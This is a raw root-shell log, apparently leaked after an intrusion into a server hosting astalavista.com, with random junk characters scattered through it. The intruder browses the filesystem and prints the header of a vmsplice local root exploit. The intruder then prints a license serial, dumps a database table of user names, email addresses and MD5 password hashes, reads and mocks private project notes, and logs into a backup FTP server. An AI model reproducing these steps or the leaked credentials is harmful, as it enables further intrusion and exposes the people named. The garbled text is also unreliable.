$ p. Y5 I1 ?/ T& L8 D' G9 f5 esh-3.2# cd ..
. _" A Y# K0 A fsh-3.2# cd com
8 L! j$ s Q, o% dsh-3.2# ls -la
6 o/ ?" O; a( a; T1 Ttotal 141208. t4 n* r/ {. R$ b
drwx–x–x 10 com com 4096 Apr 28 12:40 .: {$ E t; e' N3 D4 f
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 U: A* y5 `$ O9 G. @- b
drwx—— 2 com com 4096 Jun 4 04:04 backups
, B% w- Y, l: W" R-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql% d9 D" E `/ W% r+ S0 n
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
8 Q! u; [% r y8 G% }! H5 ?* P-rw——- 1 com com 21880 Jun 2 08:07 .bash_history. V$ G8 ]; B3 ]
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout4 U1 [2 @& U4 _4 |& W
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
. x4 R0 l! J; \; z; A-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc2 l+ }; b: X1 c! K9 o8 L8 C: |
drwx–x–x 3 com com 4096 Jan 29 2008 domains" p" K7 A- F' [$ ^ ^
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed8 |- k' \, z3 X) E1 _3 O8 \7 w7 ?
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap( e$ p7 o r+ E2 F
-rw——- 1 com com 69 Nov 18 2008 .lesshst
$ a+ L# b$ P* L3 M8 \0 B8 tdrwx—— 2 com com 4096 Sep 24 2007 mail" y6 ?, v6 N, z6 }7 e7 w1 i% @
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
4 x. J8 V) \0 R y: ?. L- t: ~drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
, S' V) M7 w+ |- P; o! G5 zlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
6 y9 {/ H$ |6 f6 L& E7 N4 p1 k d-rw-r—– 1 com mail 34 Sep 24 2007 .shadow7 s4 w6 q0 z/ r. O& u9 J
drwx—— 2 com com 4096 Aug 26 2008 .ssh
) }1 R& P, W" w' L-rwx—— 1 com com 8515 Feb 10 2008 t
; s, h- ?& E! s! Z/ K6 l6 D-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
7 @5 y0 c# a/ ^- }5 mdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
g1 p. U3 a* i, T d-rw-rw-r– 1 com com 617 May 20 2008 .toprc; t3 a5 t( Z( ?
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
8 \- m7 D; a9 Q" m-rw——- 1 com com 16629 Mar 28 21:46 .viminfo+ a" M! B% b4 v5 g
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc7 N0 G5 A( r6 Z- C' Z; [
) D9 p a6 H, x* w
sh-3.2# head t.c
4 T f( _8 n. ^/*! ^& L& Y) I9 \8 s6 N
* jessica_biel_naked_in_my_bed.c
& M9 S5 J5 u. y9 t7 J, L*) H+ S0 J: [' c6 t' m Y* J
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.2 l0 O1 W! J. Z8 S* g4 G0 {
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
1 ?/ R" v0 ]1 i. J/ E* Stejnak je to stare jak cyp a aj jakesyk rozbite.
/ V* [& b! X# J4 ]# Y* U/ M*
; Z! r: o6 f( O1 `2 B; E* Linux vmsplice Local Root Exploit e, r* v& @8 I1 S) W
* By qaaz
# P! O1 a, d8 c- [*1 O* z2 Q. v' A' s) \
8 }2 x0 d# B6 |; q5 \2 Qsh-3.2# cd /
5 ~9 y; i+ D0 k/ [1 Msh-3.2# ls -la
+ |2 f. D8 @ t, f8 ~: gtotal 360
9 v, G6 n8 W- a; T4 `9 n& Ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 .7 _ o k3 H' A" H
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..- F3 c' n! J# _) Z9 N
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
9 v. U& b& A# q4 m4 c3 `, c0 s-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
: d4 ^3 o5 m! H! z% K ^9 ^/ ^# K) S-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
. I+ d5 r3 |" S6 X' K( ~/ p7 A! G-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
' v/ C4 f! i p3 V% I8 x-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
- @5 d( W0 r/ ^drwxr-xr-x 3 root root 4096 Dec 29 2007 backup) h( ^4 u& ^9 S& B
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin. _) n4 u3 f! w. z7 Z5 I
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
9 [* r( Y! e# ?) r @4 udrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev( j+ `' O! `7 w$ I) Q# N t, m
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
0 ]5 n# m* |. n8 Y/ Ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 home7 H: B/ ~( h5 H( ?5 U
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf: O# r5 r$ u+ w% V: x
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib W! x" ]4 J2 p$ o( ~" G, n, n8 E
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib646 D9 ~! p' k" K7 n/ K' H
drwx—— 2 root root 16384 Sep 11 2007 lost+found
$ l( ^( t( N$ mdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media1 ~4 C+ ^& m( v' J
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc. G% W4 H7 `% T- |" g3 ?; I6 O
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
5 Z0 a' _* Q% V3 r0 M-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
W& y) k _& u* e. T+ c& b" C( Cdrwxr-xr-x 2 root root 0 Jun 3 02:43 net$ O2 F! h# A8 w! A9 b. k. W
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
8 |' }: N, O1 o Tdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
7 S& X7 O) Y$ O( z5 ddrwxr-x— 15 root root 4096 Jun 4 08:40 root
, ~& @" o9 Q- {4 s6 ?4 B2 rdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
" r3 i- F: g0 B; R2 Z- r% `drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux+ c9 `4 R/ t2 m" i
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
9 B3 l1 F) g$ D* Idrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
0 R; ]7 L: V# Y& Hdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp6 o5 z, I4 x: N t: v
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
0 p- ^5 @7 C. g) cdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var; y9 m7 p/ d( w' K5 A5 `) {
4 U8 | j" J) h* B7 D, A: hsh-3.2# cd opt& p. v" h0 [! W; w+ R
sh-3.2# ls -la
9 o& `1 d k8 \! V) b7 Q9 ? d) Gtotal 20! Z& h" j6 g* x3 }; V' \: j$ P
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
M- C+ {6 ~, N9 v' odrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
* q: r8 h8 w& m4 bdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws! k. c% {3 d) M& D( N
" f: R0 o9 o, a/ d2 U( h9 c
sh-3.2# cd lsws/7 J# ?- h3 Y1 @
sh-3.2# ls -la
5 c7 }& q D4 x5 }/ C; M. Ytotal 108
0 G& Q& a4 \7 o0 i6 M) r I. [drwxr-xr-x 15 root root 4096 Mar 20 2008 .3 F( E8 `" [9 c0 b) v8 @, g+ G
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
0 `9 {6 ?/ \, }3 x9 @& a4 u% z; rdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons" Z2 t f& n6 K0 J- T
drwxr-xr-x 13 root root 4096 May 29 15:10 admin& C, Y4 l9 X$ e% U, U& i7 w
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate4 u1 S/ ~8 t$ `; q+ [
drwxr-xr-x 2 root root 4096 May 29 15:10 bin; `# ]3 N: Y" ~9 ~3 g- f
drwx—— 4 apache apache 4096 Jun 3 02:43 conf" v4 V& i0 t) d5 c
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
8 H: [4 N3 u* O* R, [- Fdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
7 G# R+ ^8 ?" L8 f6 f* `drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin3 t, b$ h$ w% U
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
5 u% d: e2 C7 ^7 ~/ p4 y-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE- z+ i- v; f; p. A# c G+ g
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP, \% Q Q, N0 }& H2 ~
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
: j: }, B) N) Q; E+ |' X d Q-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP2 e* ^$ O! ^6 B* |& \8 [ B
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
8 }4 {( S1 G3 I" a g2 ~% i8 ^) Idrwxr-xr-x 2 root root 4096 Mar 20 2008 php/ q1 Q {& I& v8 {
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild" a7 W% k& C" \# s: T
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
2 \: L" L) S- w6 j/ p8 x8 J-rw-r–r– 1 root root 6 May 29 15:10 VERSION
- z( @7 E. ^; K; H) _! O- N9 [1 n2 {2 r1 D: z% F L* ]
sh-3.2# cd conf
. K7 F- {9 d# r5 w Y' bsh-3.2# ls -la
. l! j$ m" o9 e% ?total 48
, P! @8 q0 C# b( {; s% J' E' t9 vdrwx—— 4 apache apache 4096 Jun 3 02:43 .
; E/ e# u: E3 _' d1 n Ndrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
9 N9 ]5 o* {) X. mdrwx—— 2 apache apache 4096 Mar 20 2008 cert
D' u+ _* g' k- g2 J+ b# o-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml2 q% p" p0 i& U
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak2 z& w4 U4 h/ E+ s! R' Y/ t
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
; D8 {+ r, h% Y. Z' ~% E- [-rw——- 1 apache apache 256 May 29 15:10 license.key+ W, V2 h/ }( u R/ B+ p
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
* u7 r \: `7 N$ d4 @-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
/ d! h& z7 Q( P z. }-rw——- 1 apache apache 20 May 29 15:10 serial.no" F+ g$ m4 [- K8 Z% L. ?& J* f H
drwx—— 2 apache apache 4096 Mar 20 2008 templates( |( {" {/ e% Z+ Q
2 n4 J4 u; d% v. z' ^
sh-3.2# cat serial.no. b2 e- j f, p1 J5 T4 q
IbDl-oVsO-CKqL-wVRa! B7 y$ \$ d% C. E
+ s& ^9 x! `$ N4 _
sh-3.2# mysql% T0 ~" ?8 m3 a: x
Welcome to the MySQL monitor. Commands end with ; or \g.! |( t6 g+ `8 _/ z7 g( D
Your MySQL connection id is 2868440 Q% ~& Q. U, c6 W2 {& a4 b
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
2 f5 z1 N+ S4 b$ i4 d z# e! O: B/ s- O5 B3 t/ X
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer." ^' r% x( C- Q9 F" E
. y( G* m$ G2 _- a0 Emysql> show databases;
; R3 K. h% k5 [- I$ A) I+———————–+
" U" |7 K ^0 l/ l| Database |1 T& i/ t. F1 D3 q
+———————–+7 h/ _9 V! _, ?1 [+ h% D/ {3 _- q
| information_schema |
4 s2 w. F# j) m! A| astanet_ads |
7 c& p- c; a8 I. {: P- [' B' b L| astanet_mailing_lists |. E$ F7 ?: u0 C+ ~( ]& s2 V" a( `
| astanet_mediawiki |
+ d% b( W5 [ ?8 m7 q1 p8 l0 o- V| astanet_membersystem |. c1 e6 q9 [9 `2 f) O
| com_contrexx |
: T! H8 ~- M5 D2 A( ^7 l9 t! S| com_contrexx2 |
0 R9 V2 B! t: p6 e; Z3 h+ q9 K2 p| com_contrexx2_live |
2 [' b# i8 @, j6 Q4 b7 q2 @| da_roundcube |7 h+ d3 V6 I* t/ j2 {
| dolphin |( g2 v7 ^2 K! Q$ B6 A; @
| ideapool |# G( t8 B n4 G! c5 n, n
| mysql |
4 [1 K- c( `0 |: e" L$ W| test |& E U! f0 T: Z: I2 j
| yourmaster |
+ G/ |4 R, z M) y+———————–+5 {8 x7 m8 R6 c( W0 Y# T& e
14 rows in set (0.00 sec)
9 t; s% x, b! @
& \" S- p- k) E |mysql> use ideapool
0 {: c. i- T. O2 g. j/ }- fDatabase changed J5 [/ [0 A. t& _3 c
mysql> show tables;: v- x1 f6 R) ~. C; o" ^1 i
+———————————–+
+ U4 u" {$ ^& Y3 W$ b v| Tables_in_ideapool |
$ S; T6 i3 p( F* B8 L6 L+———————————–+
% q6 ~: @2 T$ J& w( A% V- n| eventum_columns_to_display |
2 r* K% s. P4 t. A! k| eventum_custom_field |
) R% |+ l3 G# ~$ o) q. R| eventum_custom_field_option |
' {& }8 F. c7 v| eventum_custom_filter |# X6 |5 a8 V6 k* w/ u e
| eventum_customer_account_manager |$ W, M4 j" |5 y
| eventum_customer_note |
$ F( ~4 b8 q" e$ T2 D* v- z| eventum_email_account |
3 i8 i. k+ t. N B| eventum_email_draft |
' d; p( \4 e! q( G. n0 Z| eventum_email_draft_recipient |
, ?9 d2 y- H* Y$ e0 q' M u| eventum_email_response |! z+ l+ f4 v0 X' h% P
| eventum_faq | ?% w6 l _" n+ Q
| eventum_faq_support_level |
* Q; p( i. s' B+ C: m, ], K| eventum_group |# w# X8 x' ?( D! ?! j* u
| eventum_history_type |
7 r! G) f0 r5 Z: e3 X| eventum_irc_notice |: u+ g$ S1 Q6 H# Y1 X
| eventum_issue |" [1 |- Z$ b9 N; i# R" G& r
| eventum_issue_association |' X: B3 U! V% `9 M* f
| eventum_issue_attachment |0 m! R* L1 J4 a. j4 K
| eventum_issue_attachment_file |
/ J/ a3 \1 S7 ~7 b% D; D| eventum_issue_checkin |7 f1 F i8 b+ y( {& |; ?- J
| eventum_issue_custom_field |9 d6 Q" z& t) w" k9 h" Y
| eventum_issue_history |
( R& g- k) n& l7 r, ^7 V5 K0 `0 p| eventum_issue_quarantine |4 v; W* _- o* G/ x4 k9 U
| eventum_issue_requirement |
- f7 ]8 f$ c- [5 v' e# }| eventum_issue_user |
% R5 G/ A$ X; G6 ?( V; V! ?" c| eventum_issue_user_replier |* R. R* p% _% P$ n/ n! ]
| eventum_link_filter |
* F5 z" M! F, h| eventum_mail_queue |$ X3 a+ a q0 ^& H/ U* O9 c0 M8 A
| eventum_mail_queue_log |/ Z' P: A9 P1 g
| eventum_news |! x' R: E$ I; G5 {
| eventum_note |8 U: o3 ]- s$ y1 v* [
| eventum_phone_support |
9 l' V. {/ Q$ }: ^# ~9 x| eventum_project |( K* q( X& E) T$ [1 _. J; l- U
| eventum_project_category |; G+ x5 T, ~! c9 L, d5 ?
| eventum_project_custom_field |8 w$ B: |1 n U- }/ U& G3 p1 {
| eventum_project_email_response |0 d7 z8 A- e* O3 |; F
| eventum_project_field_display |
( a& ?: Q% k7 V" O7 v- j4 q| eventum_project_group |" X" O' c: i6 e7 y) x% U
| eventum_project_link_filter |5 W3 c4 P! L, Q2 m
| eventum_project_news |
6 d' g# g" b6 V; n| eventum_project_phone_category |" V) q- y, t$ x1 V2 a1 D, s
| eventum_project_priority |; _: M( ?. V& f) \
| eventum_project_release |3 q5 U/ r; L1 j2 r# y
| eventum_project_round_robin |
8 g2 ^6 h3 u$ J, s% t/ [| eventum_project_status |
- q# X/ p+ S9 Q* s: @! E| eventum_project_status_date |
( U6 P+ X4 S8 J; Q) S5 a! c& q| eventum_project_user |
4 q+ o- p% I1 u# Z( K| eventum_reminder_action |1 t2 E- s' R4 }) |* ~8 a( l
| eventum_reminder_action_list |
5 T* ]8 d. C1 U* W. S( ~| eventum_reminder_action_type |3 B y( H* E0 n9 R& J! m, C& q8 E
| eventum_reminder_field | _+ f. J/ m; e
| eventum_reminder_history |
3 j3 }8 W& }7 Q: p+ [2 V| eventum_reminder_level |3 f& `+ l& ?& t( {( E) ?, P
| eventum_reminder_level_condition |6 P& z8 i) J! A6 U1 h, {
| eventum_reminder_operator |+ S& _% N H1 P: r5 ^' ?. U& D
| eventum_reminder_priority |
) s! P5 U8 h2 v* e6 y| eventum_reminder_requirement |4 Z, p+ ~8 H# U6 E' p1 W7 E
| eventum_reminder_triggered_action |# e9 D& G1 T7 b. T! j/ }6 _
| eventum_resolution |
5 G% r7 m2 X( \& L+ E| eventum_round_robin_user |
2 x; n/ ~( l3 O" m1 M$ @7 n; C| eventum_search_profile |/ `! P' F j% j" g& e
| eventum_status |$ q8 U" K* Z+ k& U
| eventum_subscription |: [4 ?. _- ?1 ]8 W" N f' u
| eventum_subscription_type |
: r" L# `+ V' U| eventum_support_email |! U3 ]* F; u+ c# r
| eventum_support_email_body |) d5 _. l- e/ ^+ f+ ~5 p# g ?3 P5 n
| eventum_time_tracking |% V) R% Q C" m( l f
| eventum_time_tracking_category |2 J( J7 A% m$ m3 Y/ x, g& z
| eventum_user |- Z T2 q, C- {2 E
+———————————–+
/ ]( d+ E% v' v" y) p( @69 rows in set (0.00 sec)2 R1 z! _5 I# {/ ^5 V1 R
% J# u$ d+ }4 Q5 H
mysql> describe eventum_user;' K& `! \4 |' G& C
+————————-+——————+——+—–+———————+—————-+
: [4 a7 Q! Q4 a/ t9 u| Field | Type | Null | Key | Default | Extra |* Q& \& T7 ?, g8 C+ E$ ^9 @
+————————-+——————+——+—–+———————+—————-+
\: ]' M! j9 q; }# P( J% ^| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
4 S1 U6 z# N. m* B* @2 c! Q| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
* D' F0 Y3 J; z# x9 N' i8 e* b- x| usr_customer_id | int(11) unsigned | YES | | NULL | |
& `! v) p, v9 a; }4 `1 d| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
+ A/ V: f( \8 |3 k; O| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
9 p# z. F9 E+ r| usr_status | varchar(8) | NO | | active | |( e" f; T6 W3 Y
| usr_password | varchar(32) | NO | | | |
2 K9 S6 r; n+ |- _2 a' Q! i1 y+ n| usr_full_name | varchar(255) | NO | | | |
' W6 t! t: k5 T' H) c* q# Q| usr_email | varchar(255) | NO | UNI | | |/ P) A$ \1 {# l x3 F4 r) s4 b3 E
| usr_preferences | longtext | YES | | NULL | |
: {( b- g: a( {# Z6 b, D' {| usr_sms_email | varchar(255) | YES | | NULL | |! Y5 L* I+ g$ k- h: {( D% N9 ^- N
| usr_clocked_in | tinyint(1) | YES | | 0 | |% O2 r2 ?" M' X$ @# r. k$ K, J
| usr_lang | varchar(5) | YES | | NULL | |
# `! Y, e- s0 Z A4 Q; z S7 j+————————-+——————+——+—–+———————+—————-+
: q& y2 h$ M+ G8 b13 rows in set (0.00 sec)3 v) m% z; V# p8 _# f
4 j. U: ]9 A3 C3 g' E$ g. Lmysql> select usr_full_name,usr_email,usr_password from eventum_user;
+ K7 d- v$ m1 Y, F- B+———————-+——————————-+———————————-+
$ |# N' A# `2 b| usr_full_name | usr_email | usr_password |" R1 W; p v- d& P, D$ c8 Q
+———————-+——————————-+———————————-++ l- L- m7 E1 M' h# y6 L/ \
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |% f" a; ^' j* |/ V( x
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
# S1 E- N% ^0 F% ]. Z$ A& J; m| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
Z. v, R* d- u* w& I- M| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |. \& _- w* I2 v( c+ t
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |2 T! O; L1 u, s& n* j$ w
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
! W; V0 J S: i8 q| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |/ }5 ^! @* m1 z( j
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
. E0 O8 ?! d, U| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
& G$ {; S1 A$ r% C" }0 e. Y| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
, ?" w5 i: H5 [5 w3 z6 y| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
, @6 N( g7 d9 T5 c# ~| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
$ ^ `, n# u8 \1 }* [9 k- || Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
1 Z+ y1 I. ?/ O% e% C' V2 ?| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |% J* L0 s- A9 \. ^2 p& L
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
4 T) S: y) L% \8 O# e- D+———————-+——————————-+———————————-+) c. g6 g7 s) P* Q
15 rows in set (0.00 sec)
3 D/ g L" V r6 U' ~9 ~
# Q* Z$ `" w8 T8 ?+ smysql> select iss_description from eventum_issue where iss_id = 43;
s* I: ^* D; z* S- `+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
% g1 `. L- T; E) M| iss_description " y- X( C7 l2 r
|4 d3 ]& Y& S$ ]9 ^6 @
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
0 A+ j+ m/ D7 \; }4 }| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
6 `" h6 ^, f+ k# e/ Pconnected for 90 mins… 120mins… so what i propose is something like:
' v* E; g& F1 S! B链接标记[url]http://www.surfthechannel.com/[/url]* W. d- Y4 L1 h; Y
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system( h% E0 i! F8 ^ q; [
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t: x. ~1 A9 H0 L0 i
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
2 u8 }* k# p+ c5 o6 m* z9 iif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
0 Z2 c* Q2 m: S, v4 u5 j1 H7 q. V, ]9 C" Q" f+ l9 E: Z5 s
We could also put advertisement during play on the flash video player itself… extra $$…
# r( o" ^/ w& Q+ ?1 s3 b
9 ? k. H8 I0 A! qBy sykadul |
; ~9 L3 M; m% B: k+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
" z) j& x$ G6 P& I4 |1 row in set (0.00 sec)6 {* A) [& P' @- w1 W6 G
& {; S. B' a, y# F/ O( F
// Money and extra $$ is all they care about. remember that.# @) m- G3 L5 Z# b" @0 L2 O
/ C2 m1 p+ w$ |: H, N
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;3 s: n# ~- t4 N% B/ h: F
+————————+——————————————————————————————————————————————————————————————————————————————-+2 R! H D) q* z1 T
| iss_summary | iss_description 3 m% b- V v" j3 O3 [4 ^7 H- ?! b2 L
|+ W) {1 ^) x3 I, o$ I% }! n
+————————+——————————————————————————————————————————————————————————————————————————————-+
~# |9 O& o$ b% z8 S* f3 @| Forum for REAL EXPERTS | Hello,; F6 ]' m/ U4 s0 s" u3 D
- u& b* [' r2 a& u/ } vIshtus and I,1 R" i( d. \' x. V* p+ j# p
1 C$ Q0 E } y2 P8 P! J7 U+ p1 L
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide$ s) E, `7 F. M$ Q1 {/ y# [6 S+ e1 ?0 ?
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
9 `. J- q; [# ]! c2 z% i$ f
' p1 R. T* s1 x; [) q4 f5 b# U3 dOne example a friend of mine from coresecurity.com!
8 n) p6 \3 Z; o
" P. L0 y! Y9 B0 HWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc... L+ ~3 Y! _2 ?1 U+ |. T
- v& M4 h! F* E( ^6 W
|% c1 r y( b6 [
+————————+——————————————————————————————————————————————————————————————————————————————+) q- t t7 R& g) ^+ L
1 row in set (0.00 sec)- t, s. N( a, \& x6 n, X2 y/ Z j
; p4 v7 A3 d" g4 \' j; p0 Z// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
0 a' N$ I% `+ C) L# C" f
, K, }! i. a8 `mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;3 Y- N0 V- s8 v. M6 o2 g" ^
+——————+———————————————————————————————+
" \6 y+ z0 e9 V& j1 [" y& B| iss_summary | iss_description |
; |# r' b! V0 e4 W& ?9 V0 a+——————+———————————————————————————————+
* P. s* o% o# \0 z| Website guidance | Virtual Girl which guides you trought the website.- f9 {3 c1 i: ]
+ Z" ^5 \3 p; m4 a4 f% oWe need a girl with who you can ( talk )!!!/ \4 h, h- b7 W# g
Also for the News!6 u/ P5 }. u3 k! o) D
So my suggestion is a girl who read you the news loud if you like!& {' n+ w0 w! L* D/ c+ a
you can choose between read yourselfe or she read it for you or both!+ W& `! P) _# U5 [
. ~) e" R4 | g6 L; ]: J
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!! |. B) H( _2 Q
1 p5 x9 h) B7 r# m
Have a look on the example girls!!
* o3 @$ v* \- i9 L' `8 J X6 X. [
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
; W" O5 Z/ u2 V
1 D6 _ f+ @/ A6 K4 @( t) q+ ?* Lor that
4 @; L+ E' B& M- } _6 `
; I; }& ?1 R* U% {1 W* {: ?链接标记[url]http://www.yellostrom.de/[/url]$ |" B- n# G( q+ D: c, @: N7 G
; \3 C' [7 o3 u: j
|9 @2 v5 B7 d% w9 o
+——————+———————————————————————————————+
$ N, k3 Z" A6 C. G5 [1 row in set (0.00 sec)* z9 }- m3 m2 e1 W# C
: o4 N# c2 Y. }& H
// ha ha.
5 x& T3 v. @5 p4 ^$ ~
! w* [) K) o, `0 V( l' Jmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
$ U1 r! Y# U( x( |2 p! G+————————–+———————————————————————————————————–+, f' ?: E+ g, x5 ~, D
| iss_summary | iss_description |
% ]( f1 I$ w; e. q- A2 U+————————–+———————————————————————————————————–+$ C9 l$ |+ D) R' c; r0 m# ?+ V
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
( k8 p2 Q5 g8 T0 r5 A8 U0 J+————————–+———————————————————————————————————–+
7 G6 r8 e. v$ C/ d' k- u8 i1 row in set (0.00 sec)7 s: f" z2 A& U6 n! y' _
d, k, s% \- D$ i
// LOL.
0 s( Y6 R2 f' E2 j2 R" h7 {1 {5 P% f/ \9 w3 |3 A
mysql> exit
( _% q/ U6 f' A/ Y* e( @! hBye
- h2 o% R- O) f' O1 m3 @
$ ^- s a1 ]% q5 S0 ssh-3.2# ftp 212.254.194.163
. X" b( p5 o% `/ ?. HConnected to 212.254.194.163.
3 Q+ F+ \! o( h. N3 @220 BackupCOM_VW FTP server ready.
1 x% k' R" B* R. A7 w4 S1 i504 AUTH: security mechanism ‘GSSAPI’ not supported.
. p1 X9 M; u0 v h% _504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
2 S( P/ d5 o9 A2 cKERBEROS_V4 rejected as an authentication type
% F+ o. \8 \9 D' ?# Z1 HName (212.254.194.163:root): astalavista.com' N$ Y5 a3 N; j: T4 W0 \
331 Password required for astalavista.com., F3 R# o) O- _- E y9 Z8 P* L
Password:3 {3 B- t2 [6 }+ s: @ x' T
230 User astalavista.com logged in.
% s I e' Q8 F/ d; R! RRemote system type is UNIX.* ~6 V' m0 v7 Z
Using binary mode to transfer files.
3 E9 V" r$ a( m( h+ @: u" _ftp> ls -la, g" b2 ~8 Z( [, o* s; C; l/ Z
227 Entering Passive Mode (212,254,194,163,2,188)
2 R1 D/ u/ _. g9 e+ U9 O150 Opening BINARY mode data connection for ‘file list’.
/ ]5 t$ Z+ Q& U, A8 G1 c+ \4 O) ]# m3 qdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
: t! i! K _6 T P1 l% M6 ^1 @9 [1 H `226 Transfer complete. x4 R& F5 ]3 Z3 z
ftp> cd astalavista.com' C, m( s3 y5 Q% R' X
250 CWD command successful.
